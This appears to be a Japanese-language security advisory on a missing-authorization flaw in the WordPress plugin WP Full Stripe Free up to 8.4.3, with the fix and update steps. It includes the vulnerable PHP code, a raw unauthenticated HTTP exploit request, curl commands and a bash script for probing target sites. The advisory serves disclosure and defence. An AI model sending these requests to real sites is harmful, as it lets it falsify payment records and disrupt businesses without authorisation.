
WP Full Stripe Free <= 8.4.3 - Missing Authorization
WordPress用プラグインWP Full Stripe Freeは、バージョン8.4.3(およびそれ以前)において、AJAXアクションwpfs_update_failed_payment_statusを介して認可の欠如の脆弱性が存在します。
脆弱なAJAXエンドポイントは、wp_ajax_ と wp_ajax_nopriv_ の両方のフックで登録されています。
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
update_failed_payment_status() 関数(3835~3865行目)は以下を実行します:
current_user_can() なし)wp_verify_nonce() なし)is_user_logged_in() なし)// wpfs-customer.php, Line 3835-3865
function update_failed_payment_status() {
try {
$result = [];
$failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
$failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
$paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
$paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
// ... 処理前に認証チェックなし ...
$updateData = [
'paid' => 0,
'captured' => 0,
'refunded' => 0
];
// 攻撃者は制御可能な値で上書き可能
if ( $lastCharge ) {
$updateData['last_charge_status'] = $lastCharge->status;
$updateData['failure_code'] = $lastCharge->failure_code;
$updateData['failure_message'] = $lastCharge->failure_message;
} else {
$updateData['last_charge_status'] = 'failed';
$updateData['failure_code'] = $failureCode;
$updateData['failure_message'] = $failureMessage;
}
$this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
// ...
}
}
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
| 影響領域 | 深刻度 | 説明 |
|---|---|---|
| 整合性 | Medium | 攻撃者が正常な支払いを失敗としてマーク可能 |
| 機密性 | なし | データ漏洩なし |
# エンドポイントが認証なしでアクセス可能かテスト
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_cve202612432" \
-d "failureCode=TEST_CODE" \
-d "failureMessage=TEST_MESSAGE"
# 期待されるレスポンス(脆弱な場合):
# {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
# 重要な指標は、エンドポイントが認証を要求せずに応答すること
#!/bin/bash
TARGET="https://TARGET"
# 脆弱性の確認
echo "[*] Testing CVE-2026-12432..."
RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_123" \
-d "failureCode=XSS" \
-d "failureMessage=INJECTED")
if echo "$RESPONSE" | grep -q "success"; then
echo "[+] VULNERABLE - Endpoint accessible without auth"
else
echo "[-] Not vulnerable or error"
fi
wpfs-customer.php の3835行目に認可チェックを追加:
function update_failed_payment_status() {
// このチェックを追加
if (!current_user_can('manage_options')) {
wp_die('Unauthorized');
}
// ... 関数の残りの部分
}
WP Full Stripe Free >= 8.4.4 にアップデート
# WordPress管理画面から
ダッシュボード > プラグイン > WP Full Stripe > 更新
# WP-CLI経由
wp plugin update wp-full-stripe-free
# SSH経由
wp plugin update wp-full-stripe-free --version=8.4.4
wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php を確認current_user_can() が欠けているか確認# 脆弱なバージョンがインストールされているか確認
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
# AJAXエンドポイントのテスト
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
| 可用性 | Low | ビジネス運用を妨害する可能性あり |